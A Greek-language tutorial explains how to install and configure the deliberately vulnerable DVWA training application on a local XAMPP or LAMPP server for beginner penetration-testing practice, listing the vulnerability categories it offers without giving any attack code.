Εμείς θα χρησιμοποιήσουμε το Damn Vulnerable Web App. Τι είναι αυτό; Όπως μας λέει και στην επίσημη ιστοσελίδα του:Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Λογικό ακούγεται έτσι; Είναι φτιαγμένο για ειδικούς ασφαλείας, ή για άτομα που θέλουν να ασχοληθούν με αυτόν τον τομέα, έτσι ώστε να δούν σε ποιο επίπεδο βρίσκονται. Επίσης θα καταλάβετε και πως να "κλείσετε" τις τρύπες που δημιουργούν το πρόβλημα. Πηγαίνουμε σε αυτή τη σελίδα και πατάμε το κουμπί "Download" ώστε να κατεβάσουμε τα απαραίτητα αρχεία.


Μόλις τα κατεβάσετε(θα είναι σε μορφή .zip) θα κάνετε αποσυμπίεση τα αρχεία που περιέχοναι μέσα στο συμπιεσμένο αρχείο. Μόλις κάνετε την αποσυμπίεση στον ίδιο φάκελο θα δείτε έναν φάκελο με το όνομα "dvwa" (τα αρχικά από το Damn Vulnerable Web App).
Θα πάτε στον φάκελο Htdocs. Στα windows θα είναι: C:\Xampp\Htdocs και σε Linux -σύμφωνα με το 2ο τιτόριαλ- θα είναι στον φάκελο file system>opt>lampp>htdocs. Μόλις πάτε σε αυτόν τον φάκελο θα διαγράψετε ΟΛΑ τα περιεχόμενά του. Στη συνέχεια θα κάνετε επικόλληση τον φάκελο που βρισκόταν στο αρχείο που κατεβάσαμε(dvwa).

Οπότε στον htdocs θα βρίσκεται μόνο ένας φάκελος με το όνομα dvwa.

Αν δεν μπορείτε να κάνετε την επικόλληση-αντιγραφή τον φάκελο ενώ είστε σε Linux δεν έχετε δώσει τα κατάλληλα δικαιώματα στον administrator. Μετά από αυτή την απλή διαδικασία ξεκινάμε Apache και mysql από το control panel(θα βρίσκεται κάτω-κάτω στον φάκελο xampp σε Windows), ή αν είστε από Linux από το terminal όντας root θα πάτε στην διαδρομή /opt, και από εκεί με την εντολή lampp/lampp start θα ξεκινήσουν τα παραπάνω.
Μόλις πάμε στο "localhost" ή στο "127.0.0.1" από τον browser μας αν τα έχουμε κάνει όλα σωστά θα δούμε αυτό:


ΠΡΟΣΟΧΗ: Αν σας πετάξει κάποιο σφάλμα είναι λόγω του ότι δεν δώσατε δικαιώματα στον administrator(αφορά μόνο χρήστες Linux).

Πατάμε στον φάκελο που βλέπουμε και θα βρεθούμε σε αυτή τη σελίδα:

Εμείς θα πατήσουμε το link ώστε να δημιουργηθεί μια νέα Database. Μόλις πατήσουμε εκεί θα μας εμφανιστεί η κύρια "ιστοσελίδα" που θα είναι ακριβώς έτσι:
 
Πατάμε τώρα στο κουμπί "Create /Reset Database" και είμαστε έτοιμοι!
 
Το μόνο που έχετε να κάνετε τώρα είναι να πάτε στην καρτέλα "DVWA Security" και να αλλάξετε την ασφάλεια από high σε low, έτσι ώστε να ξεκινήσετε απλά. Το Default Username σας θα είναι "admin" και ο κωδικός "password".
Μπορείτε να δοκιμάσετε τις δυνατότητές σας σε Brute Force σε 3 επίπεδα δυσκολίας, Command Execution, CSRF , File Inclusion, SQL Injection, Blind SQL Injection, Upload και XSS. Αν κατεφέρετε να εκμεταλλευτείτε επιτυχώς όλες τις κατηγορίες τότε αλλάζετε το επίπεδο δυσκολίας.Η διαδικασία είναι πολύ απλή και θα σας βοηθήσει στα πρώτα σας βήματα πάνω στο Pen. Testing.